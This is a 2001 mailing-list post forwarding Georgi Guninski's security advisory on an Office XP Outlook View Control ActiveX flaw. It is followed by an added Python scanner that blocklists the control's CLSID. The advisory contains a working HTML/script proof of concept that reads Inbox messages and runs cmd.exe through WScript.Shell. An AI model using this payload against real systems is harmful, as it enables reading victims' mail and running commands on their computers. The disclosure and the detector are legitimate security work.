interesting-people message



Subject: IP: New MS innovations: Was Microsoft Office annoying me...



>
>Date: Fri, 13 Jul 2001 10:35:42 -0400
>To: farber@cis.upenn.edu
>From: David Chessler <chessler@usa.net>
>Subject: FWD: New MS innovations: Was Microsoft Office annoying me...
>
>* Original: FROM..... Seth Milder
>
>Office XP just got more annoying:
>
>
>------------------------------------------------------------------------
>Georgi Guninski security advisory #49, 2001
>
>MS Office XP - the more money I give to Microsoft, the more vulnerable
>my Windows computers are
>
>Systems affected:
>Win2K + IE 5.5 SP1 fully patched + Office XP.
>It was reported to work with IE6 beta also.
>
>Risk: High
>Date: 12 July 2001
>
>Legal Notice:
>This Advisory is Copyright (c) 2001 Georgi Guninski.
>You may distribute it unmodified.
>You may not modify it and distribute it or distribute parts
>of it without the author's written permission.
>
>Disclaimer:
>The information in this advisory is believed to be true based on
>experiments though it may be false.
>The opinions expressed in this advisory and program are my own and
>not of any company. The usual standard disclaimer applies,
>especially the fact that Georgi Guninski is not liable for any damages
>caused by direct or indirect use of the information or functionality
>provided by this advisory or program. Georgi Guninski bears no
>responsibility for content or misuse of this advisory or program or
>any derivatives thereof.
>
>If you want to link to this advisory or reference it use the URL:
>http://www.guninski.com/vv2xp.html
>The above especially applies for companies like Mitre and BugNet
>
>Background:
>
>Recently I bought Office XP.
>It was quite an unpleasant feeling giving so much money for so buggy
>a product.
>
>Description:
>
>If a user visits a specially designed html page with IE or opens or
>previews a message with Outlook XP, arbitrary commands may be
>executed on his computer. This may lead to taking full control over
>the user's computer.
>Using another approach to this bug allows reading, modifying and deleting
>messages in user's Outlook XP folders.
>
>
>Details:
>The problem is again ActiveX. This time Office XP seems to install a
>malicious ActiveX control - "Microsoft Outlook View Control".
>This control exposes a property named "selection" which gives access to
>the user's mail messages. It also exposes the Outlook "Application" object
>which may lead to execution of arbitrary programs on the user's computer.
>Examine the script below for more information.
>
>Demonstration:
>http://www.guninski.com/vv3-2demo.html
>-----------------------------------------------------
>This assumes you have at least one message in Outlook XP's Inbox
>
><object id="o1"
>    classid="clsid:0006F063-0000-0000-C000-000000000046">
>
><param name="folder" value="Inbox">
></object>
>
><script>
>function f()
>{
>//alert(o2.object);
>sel=o1.object.selection;
>vv1=sel.Item(1);
>alert("Subject="+vv1.Subject);
>alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
>alert("May be deleted");
>//vv1.Delete();
>
>vv2=vv1.Session.Application.CreateObject("WScript.Shell");
>
>alert("Much more fun is possible");
>
>
>vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");
>
>}
>setTimeout("f()",2000);
></script>
>-----------------------------------------------------
>
>
>Solution:
>Uninstall Office XP and Windows.
>
>Vendor status:
>Microsoft was informed on 9 July 2001.
>As far as I could understand they are still investigating my report.
>
>
>Regards,
>Georgi Guninski
>http://www.guninski.com
>
>
>--
>Seth Milder
>
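
Added example, not part of the forwarded advisory or the original message: one way a mail or web gateway could flag HTML that embeds the control by the CLSID quoted in the advisory. The function names, the blocklist variable and the sample HTML are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the "Microsoft Outlook View Control", as given in the advisory.
BLOCKED_CLSIDS = {"0006F063-0000-0000-C000-000000000046"}

# Accept case differences, stray whitespace and optional braces so that
# trivially re-spelled classid values still match (conservative choice).
_CLSID_RE = re.compile(
    r"^\s*clsid\s*:\s*\{?\s*"
    r"([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\s*\}?\s*$",
    re.IGNORECASE,
)

def normalize_classid(value):
    """Return the bare upper-case GUID from a classid value, or None."""
    match = _CLSID_RE.match(value or "")
    return match.group(1).upper() if match else None

class ObjectTagScanner(HTMLParser):
    """Collects <object> tags whose classid is on the blocklist."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        first = {}
        for name, value in attrs:       # keep the first of duplicated attributes
            first.setdefault(name, value)
        clsid = normalize_classid(first.get("classid"))
        if clsid in BLOCKED_CLSIDS:
            self.findings.append(
                {"clsid": clsid, "id": first.get("id"), "line": self.getpos()[0]})

def scan_html(html_text):
    """Return one finding per blocklisted <object> tag in html_text."""
    scanner = ObjectTagScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings

# Constructed samples: only the embedding tag, no script.
SAMPLE_FLAGGED = ('<html><body>\n<OBJECT ID="o1"\n'
                  '  classid="CLSID:{0006f063-0000-0000-c000-000000000046}"\n>'
                  '<param name="folder" value="Inbox"></OBJECT></body></html>')
SAMPLE_CLEAN = ('<object id="x" '
                'classid="clsid:11111111-2222-3333-4444-555555555555"></object>')
```

A hit is a reason to strip the tag or quarantine the message before it reaches a client that would instantiate the control.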



For archives see: http://www.interesting-people.org/

